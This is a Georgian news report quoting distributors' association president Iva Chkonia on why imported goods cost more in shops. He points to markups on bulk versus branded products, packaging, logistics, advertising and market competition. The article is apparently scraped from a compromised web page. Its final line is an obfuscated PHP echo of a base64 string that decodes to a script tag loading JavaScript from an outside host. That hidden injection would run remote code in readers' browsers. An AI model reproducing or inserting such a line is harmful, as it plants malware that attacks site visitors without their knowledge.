celsiusi
ავერსი საქკაბელი
რა აძვირებს უცხოეთიდან შემოსულ პროდუქტს, ვიდრე დახლებზე მოხვდება, - ამ საკითხთან დაკავშირებით დისტრიბუტორთა ასოციაციის პრეზიდენტმა, ივა ჭყონიამ "ღამის კურიერის" ეთერში ისაუბრა.
ჭყონია ამბობს, რომ ასაწონ პროდუქციაზე ფასნამატი გაცილებით დაბალია, ბრენდირებული პირველადი მოხმარების პროდუქტების შემთხვევაში კი ფასის მატებას ბევრი სხვადასხვა ასპექტი განაპირობებს, მათ შორის მარკეტინგული და ა.შ.
"პირველი, განვსაზღვროთ ერთი რამ - ასაწონ პროდუქტებზე ფასნამატი არის ძალიან დაბალი. 2-დან მაქსიმუმ 10 პროცენტის ფარგლებში, 7%-ზე ზევით ფაქტობრივად არ არის. ე.წ. ბაზრობაზე შეიძლება ასაწონი წიწიბურა ღირდეს დაახლოებით 4.5 ლარის ფარგლებში, მაგრამ ბრენდირებულ სუპერმარკეტში, დაფასოებული წიწიბურა გვხვდება დაწყებული 6 ლარიდან დამთავრებული 10 ლარით.
რატომ? ამ პროდუქტს როდესაც შეიძენს სადისტრიბუციო კომპანია, ხდება ამის დაფასოება, რომელიც თავისთავად ხარჯია, იმიტომ რომ შემდეგ უნდა დაიბრენდოს, მოთხოვნა არის ბრენდული სუპერმარკეტებისგან, რომ მათი ბრენდის ქვეშ მოხდეს ამ პროდუქციის შეფუთვა. შემდეგ ხდება ისევ დასაწყობება, მერე კი მიწოდება. მიწოდების ჯაჭვს რა სჭირდება - იგივე საწვავი, ამორტიზაცია, ხელფასები, "ფრონტ" ოფისი, "ბექ" ოფისი, იგივე მერჩენდაიზინგის ფასი. არის იაფიანი პროდუქტი, რომელზეც არის ფასნამატი დაახლოებით 15-დან 25 პროცენტი, რომელზეც სუპერმარკეტის მხრიდან ფასდათმობა გაცილებით დაბალია, მაგრამ არის ბრენდი, რომელსაც შეიძლება ჰქონდეს 70%-იანი ფასნამატი, მაგრამ ამ ფასნამატში საკმაოდ დიდი ხარჯია. მათ შორის სარეკლამო, ტელევიზიაში განთავსებული რეკლამები, მათ შორის სააქციო ფასები.
ეს ყველაფერი განაპირობებს ფასწარმოქმნის იმ მოდელს, რითაც პროდუქტი შემდეგ ხვდება დახლზე, მაგრამ ყველაზე კარგი, იგივე იმ პირველადი მოხმარების პროდუქტებზე, რომლებიც ბატონმა პრემიერმა ჩამოთვალა, არის ის, რომ საკმაოდ მაღალი კონკურენციაა. აქ არ არის ერთი, ორი ან ხუთ კომპანია. საუბარია ათობით კომპანიაზე," - განაცხადა ჭყონიამ.
325
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");